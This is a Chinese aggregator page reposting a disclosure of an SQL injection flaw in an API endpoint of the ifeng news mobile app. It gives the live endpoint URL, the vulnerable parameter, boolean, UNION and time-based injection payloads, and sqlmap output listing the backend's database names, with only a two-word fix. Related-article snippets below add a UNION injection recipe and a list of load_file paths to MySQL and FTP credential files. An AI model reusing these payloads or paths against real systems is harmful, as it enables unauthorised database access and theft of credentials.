首页 / MYSQL / 凤凰网某应用sql注入漏洞_MySQL

凤凰网某应用sql注入漏洞_MySQL

内容导读

互联网集市收集整理的这篇技术教程文章主要介绍了凤凰网某应用sql注入漏洞_MySQL，小编现在分享给大家，供广大互联网技能从业者学习和参考。文章包含1864字，纯文字阅读大概需要3分钟。

内容图文

凤凰网某应用sql注入漏洞

凤凰新闻手机app的一个api接口过滤不严，存在注入漏洞。

注入点：http://api.iapps.ifeng.com/news/upgrade.json?gv=4.2.0&proid=ifengnews&os=android_19&screen=720x1206&publishid=2011&zip=1，受影响参数：proid

证明：

http://api.iapps.ifeng.com/news/upgrade.json?gv=4.2.0&proid=ifengnews' and '12'='12&os=android_19&screen=720x1206&publishid=2011&zip=1 返回正常数据

http://api.iapps.ifeng.com/news/upgrade.json?gv=4.2.0&proid=ifengnews' and '22'='12&os=android_19&screen=720x1206&publishid=2011&zip=1 返回数据异常

sqlmap无压力，貌似凤凰汽车频道的库也在其中，

sqlmap identified the following injection points with a total of 50 HTTP(s) requests:

---

Place: GET

Parameter: proid

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: gv=4.2.0&proid=ifengnews' AND 8025=8025 AND 'lqID'='lqID&os=android_19&screen=720x1206&publishid=2011&zip=1

Type: UNION query

Title: MySQL UNION query (NULL) - 14 columns

Payload: gv=4.2.0&proid=-6406' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7166717471,0x457a716d67506d734978,0x716d696471),NULL,NULL,NULL,NULL,NULL#&os=android_19&screen=720x1206&publishid=2011&zip=1

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: gv=4.2.0&proid=ifengnews' AND SLEEP(5) AND 'tWlX'='tWlX&os=android_19&screen=720x1206&publishid=2011&zip=1

---

[09:36:11] [INFO] the back-end DBMS is MySQL

web application technology: Nginx

back-end DBMS: MySQL 5.0.11

[09:36:11] [INFO] fetching database names

[09:36:11] [INFO] the SQL query used returns 5 entries

[09:36:11] [INFO] retrieved: "information_schema"

[09:36:11] [INFO] retrieved: "auto_ifeng"

[09:36:11] [INFO] retrieved: "auto_ifeng_2"

[09:36:11] [INFO] retrieved: "mobile_ifeng"

[09:36:12] [INFO] retrieved: "test"

available databases [5]:

[*] auto_ifeng

[*] auto_ifeng_2

[*] information_schema

[*] mobile_ifeng

[*] test

修复方案：

过滤，参数化

内容总结

以上是互联网集市为您收集整理的凤凰网某应用sql注入漏洞_MySQL全部内容，希望文章能够帮你解决凤凰网某应用sql注入漏洞_MySQL所遇到的程序开发问题。如果觉得互联网集市技术教程内容还不错，欢迎将互联网集市网站推荐给程序员好友。

内容备注

版权声明：本文内容由互联网用户自发贡献，该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容，请发送邮件至 gblab@vip.qq.com 举报，一经查实，本站将立刻删除。

内容手机端

扫描二维码推送至手机访问。

本文链接：https://qyyshop.com/info/580616.html

来源：【匿名】

【上一篇】mysql优化limit查询语句的5个方法_MySQL 【下一篇】用IE远程创建Mysql数据库的简易程序

更多 ►

【凤凰网某应用sql注入漏洞_MySQL】教程文章相关的互联网学习教程文章

Mysql注入+IIS7.5解析实战【图】

本文仅为了学习交流，严禁非法使用！！！ (随笔仅为平时的学习记录，若有错误请大佬指出)(先复现一个解析漏洞和Msbuild.exe绕过某防护软件，为后面的实战做个铺垫,以下都是基本操作，大佬不要喷)1.IIS7.5解析漏洞复现先复现IIS7.5解析漏洞(搭建环境的时候忘记截图了，只截了部分入坑图，大佬博客有详细的复现步骤 https://blog.csdn.net/qq_41703976/article/details/103844644) 入坑部分(笔者搭建环境是win2008，采用的php-cgi.ex...

mysql防SQL注入搜集【代码】

SQL注入例：脚本逻辑$sql = “SELECT * FROM user WHERE userid = $_GET[userid] “;案例1：SELECT * FROM t WHERE a LIKE ‘%xxx%’ OR (IF(NOW=SYSDATE(), SLEEP(5), 1)) OR b LIKE ‘1=1 ‘;　案例2：SELECT * FROM t WHERE a > 0 AND b IN(497 AND (SELECT * FROM (SELECT(SLEEP(20)))a) );　案例3：SELECT * FROM t WHERE a=1 and b in (1234 ,(SELECT (CASE WHEN (5=5) THEN SLEEP(5) ELSE 5*(SELECT 5 FROM INFORMATION_SCH...

MYSQL注入天书之数据库增删改介绍【图】

Background-4 增删改函数介绍在对数据进行处理上，我们经常用到的是增删查改。接下来我们讲解一下mysql 的增删改。查就是我们上述总用到的select，这里就介绍了。增加一行数据。Insert简单举例 insert into users values(‘16‘,‘lcamry‘,‘lcamry‘);?删除 ?2.删数据:?? delete?from?表名;?? delete?from?表名?where?id=1;?? ?删除结构：?? 删数据库：drop?database?数据库名;?? 删除表：drop?table?表名;?? 删除表中的列:al...

PyMySQL基本使用以及SQL注入问题【代码】【图】

目录PyMySQL基本使用以及SQL注入问题PyMySQL基本使用SQL注入问题数据的增删改查PyMySQL基本使用以及SQL注入问题PyMySQL基本使用又是一个可以帮助我们实现用代码来操作数据库的模块，安装，导入即可然后导入即可使用# pymysql基本使用 import pymysqlconn = pymysql.connect(user='root',password='123',host='127.0.0.1',port=3306,charset='utf8',database='db3' ) cursor = conn.cursor(cursor=pymysql.cursors.DictCursor) # 产...

11 May 18 子查询，IDE工具（navicat），pymysql模块（安装，查询，防sql注入，增删改）

11 May 18一、上节课复习select concat_ws(":",name,age,sex,post) as info from emp; # egon:male:18 二、子查询（一个问题一个问题解决）把一个查询语句用括号括起来，当做另外一条查询语句的条件去用，称为子查询 select name from emp where dep_id = (select id from dep where name="技术"); #子查询select emp.name from emp inner join dep on emp.dep_id = dep.id where dep.name="技术"; #链表 #查询平...

Mysql注入小tips --持续更新中【代码】【图】

学习Web安全好几年了，接触最多的是Sql注入，一直最不熟悉的也是Sql注入。OWASP中，Sql注入危害绝对是Top1。花了一点时间研究了下Mysql类型的注入。　　　　文章中的tips将会持续更新，先说说这些天研究的　　　　这里博主以数字类型注入类型进行讲解，字符类型同理，这里不在敖述。　　　　我们的环境:phpstudy+mysql+php　　　　　　我们的测试代码如下:<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> ...

05-navicat使用、查询练习、pymysql与sql注入【代码】

一、 Navicat软件""" 一开始学习python的时候下载python解释器然后直接在终端书写 pycharm能够更加方便快捷的帮助你书写python代码 excel word pdf我们在终端操作MySQL 也没有自动提示也无法保存等等不方便开发 Navicat内部封装了所有的操作数据库的命令用户在使用它的时候只需要鼠标点点即可完成操作无需书写sql语句 """ 安装直接百度搜索有破解版的也有非破解非破解的有试用期你如果不嫌麻烦你就用使用到期之后重新装再...

MySQL注入load_file常用路径

WINDOWS下:c:/boot.ini //查看系统版本c:/windows/php.ini //php配置信息c:/windows/my.ini //MYSQL配置文件，记录管理员登陆过的MYSQL用户名和密码c:/winnt/php.inic:/winnt/my.inic:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库连接密码c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini //存储了虚拟主机网站路径和密码c:\Program Files\Serv-U\ServUDaemon.inic:\windows\system32\inetsrv\MetaBase.xml ...

MySQL-注释-Navicat基本使用-复杂查询练习题-解题思路-pymysql操作数据库-SQL注入-05【代码】【图】

目录mysql语句注释navicat 的基本使用特色（个人总结）与数据服务器建立连接创建&打开数据库、表创建打开修改操作表结构修改表结构查询修改操作表数据基本语句对应的操作模型 ***** 特色功能从数据库建立模型模型页面基本操作用模型设计数据库并导出结构、数据导入导出导出导入附属小功能刷新小按钮查看操作对应sql语句执行时间查看手动筛选数据练习数据准备使用SQL语句导入表结构与数据如何验证答案是否正确题目部分参考答案(只放...

MySQL防范SQL注入风险

MySQL防范SQL注入风险0、导读在MySQL里，如何识别并且避免发生SQL注入风险1、关于SQL注入互联网很危险，信息及数据安全很重要，SQL注入是最常见的入侵手段之一，其技术门槛低、成本低、收益大，颇受各层次的黑客们所青睐。一般来说，SQL注入的手法是利用各种机会将恶意SQL代码添加到程序参数中，并最终被服务器端执行，造成不良后果。例如，我们访问接口 http://imysql.com/user.php?userid=123 来根据userid获取用户信息，假设程序...

sql注入之——mysql的四大注入基本注入手法【图】

union类型的sql注入(联合查询注入)条件：页面必须有显示位判断列数： 1’ order by 3-- - 不存在返回错误判断显示位: -1’ union select 1,2,3-- - 查看数据库： -1’ union select user(),database(),version()-- - 查看数据库有哪些表 (爆数据表)table_schema=数据库名’ -1’ union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’),3-- - 查看对应表有哪些列 ...

sql注入之mysql的联合查询爆破

）的结构以查询test数据库为例: 1.判断列数 union select 1,2,3,.......... 直到页面返回正常为止 2.判断当前数据库 union select database(),2,3,4,5 1的位置将会返回数据库的名字数据库名 database() 数据库版本 version() 数据库用户 user() 操作系统 @@version_compile_os 3.查询表名 union select group_concat(table_name),2,3,4,5,6 from information_schema.tables where table_schema=‘test‘ //group_concat()使...

深入了解SQL注入【图】

1 .什么是sql注入（Sql injection）？ Sql注入是一种将sql代码添加到输入参数中，传递到Sql服务器解析并执行的一种攻击手法 2. 怎么产生的？ Web开发人员无法保证所有的输入都已经过滤攻击者利用发送给Sql服务器的输入数据构造可执行的Sql代码数据库未做相应的安全配置 3.如何寻找sql漏洞？识别web应用中所有输入点了解哪些类型的请求会触发异常？（特殊字符”或）检测服务器响应中的异常 4. 如何进行SQL注入攻击？数字注入：...

SQL注入实战_MySQL

刚刚开始学习SQL注入入侵，有写的不对和不好的地方希望各位师哥，师姐们多多指导。在一个供求信息发布的网站上测试了一下，页面Http://www.xxx.com/new/new.ASP?id=49我做了如下测试：(1) Http://www.xxx.com/new/new.ASP?id=49Microsoft OLE DB Provider for ODBC Drivers 错误 80040e14[Microsoft][ODBC Microsoft Access Driver] 字符串的语法错误在查询表达式 ID=49 中。 /new.ASP，行36(2) Http://www.xxx.com/new/new.ASP?i...

mysql sql注入

防止SQL注入，我们需要注意以下几个要点：1.永远不要信任用户的输入。对用户的输入进行校验，可以通过正则表达式，或限制长度；对单引号和双"-"进行转换等。 2.永远不要使用动态拼装sql，可以使用参数化的sql或者直接使用存储过程进行数据查询存取。 3.永远不要使用管理员权限的数据库连接，为每个应用使用单独的权限有限的数据库连接。 4.不要把机密信息直接存放，加密或者hash掉密码和敏感的信息。 5.应用的异常信息应该给出尽可...

首页 / MYSQL / 凤凰网某应用sql注入漏洞_MySQL

凤凰网某应用sql注入漏洞_MySQL

内容导读

内容图文

修复方案：

内容总结

内容备注

内容手机端

【凤凰网某应用sql注入漏洞_MySQL】教程文章相关的互联网学习教程文章

Mysql注入+IIS7.5解析实战【图】

mysql防SQL注入搜集【代码】

MYSQL注入天书之数据库增删改介绍【图】

PyMySQL基本使用以及SQL注入问题【代码】【图】

11 May 18 子查询，IDE工具（navicat），pymysql模块（安装，查询，防sql注入，增删改）

Mysql注入小tips --持续更新中【代码】【图】

05-navicat使用、查询练习、pymysql与sql注入【代码】

MySQL注入load_file常用路径

MySQL-注释-Navicat基本使用-复杂查询练习题-解题思路-pymysql操作数据库-SQL注入-05【代码】【图】

MySQL防范SQL注入风险

sql注入之——mysql的四大注入基本注入手法【图】

sql注入之mysql的联合查询爆破

深入了解SQL注入【图】

SQL注入实战_MySQL

mysql sql注入

MYSQL - 相关标签

漏洞 - 相关标签

MYSQL - 技术教程分类

MYSQL - 最新教程

MYSQL - 最热教程